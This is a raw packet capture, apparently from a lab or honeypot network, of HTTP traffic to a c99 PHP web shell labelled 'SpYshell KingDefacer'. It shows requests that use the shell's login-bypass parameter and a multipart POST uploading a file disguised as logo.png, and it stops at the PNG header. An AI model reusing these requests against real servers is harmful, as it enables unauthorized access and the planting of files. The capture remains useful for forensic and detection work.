2017-01-20 03:22:31.946998 IP 192.168.1.102.54059 > 192.168.1.100.55555: Flags [P.], seq 1:400, ack 1, win 2053, length 399
E…..@…Zr…f…d.+….:[.~..P…g=..GET /c99.php?ry4wn[login]=0 HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

2017-01-20 03:22:31.947013 IP 192.168.1.100.55555 > 192.168.1.102.54059: Flags [.], ack 400, win 237, length 0
E..(.@@.@..u…d…f…+.~….;.P….5..
2017-01-20 03:22:31.952320 IP 192.168.1.100.55555 > 192.168.1.102.54059: Flags [P.], seq 1:5601, ack 400, win 237, length 5600
E….A@.@……d…f…+.~….;.P…….HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 08:22:31 GMT
Server: Apache/2.4.18 (Debian)
Zamani: Mon, 12 May 2005 03:00:00 GMT
Son Modifiye: Fri, 20 Jan 2017 08:22:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pratik: no-cache
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 5151
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 03:22:31.983921 IP 192.168.1.102.54062 > 192.168.1.100.55555: Flags [P.], seq 1:384, ack 1, win 2053, length 383
E…..@…Zq…f…d…..s/p…@P….[..GET /c99.php?act=img&img=up HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: image/webp,image/*,*/*;q=0.8
Referer: http://192.168.1.100:55555/c99.php?ry4wn[login]=0
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

2017-01-20 03:22:31.983929 IP 192.168.1.100.55555 > 192.168.1.102.54062: Flags [.], ack 384, win 237, length 0
E..(&.@.@……d…f…….@.s0.P….5..
2017-01-20 03:22:31.984218 IP 192.168.1.100.55555 > 192.168.1.102.54062: Flags [P.], seq 1:327, ack 384, win 237, length 326
E..n&.@.@..z…d…f…….@.s0.P….{..HTTP/1.0 401 Yetkisiz
Date: Fri, 20 Jan 2017 08:22:31 GMT
Server: Apache/2.4.18 (Debian)
WWW-Belgele: Basic realm=”SpYshell KingDefacer: Restricted area”
Content-Length: 87
Connection: close
Content-Type: text/html; charset=UTF-8

<a href=”http://xxxxxxxxxxxxxxxxxxxxxxxx”>SpYshell v.KingDefacer</a>: Erisim Engellendi

2017-01-20 03:22:56.211184 IP 192.168.1.102.54114 > 192.168.1.100.55555: Flags [P.], seq 1:624, ack 1, win 2053, length 623
E…..@…X….f…d.b……..E<P…x=..POST /c99.php?ry4wn[login]=0 HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 39127
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryLoRtloEXoMSV9bhy
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/c99.php?ry4wn[login]=0
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8

2017-01-20 03:22:56.211200 IP 192.168.1.100.55555 > 192.168.1.102.54114: Flags [.], ack 624, win 238, length 0
E..(.`@.@..T…d…f…b..E<…7P….5..
2017-01-20 03:22:56.211450 IP 192.168.1.102.54114 > 192.168.1.100.55555: Flags [.], seq 624:5004, ack 1, win 2053, length 4380
E..D..@…I….f…d.b…..7..E<P….Q..——WebKitFormBoundaryLoRtloEXoMSV9bhy
Content-Disposition: form-data; name=”act”

upload
——WebKitFormBoundaryLoRtloEXoMSV9bhy
Content-Disposition: form-data; name=”uploadfile”; filename=”logo.png”
Content-Type: image/png

.PNG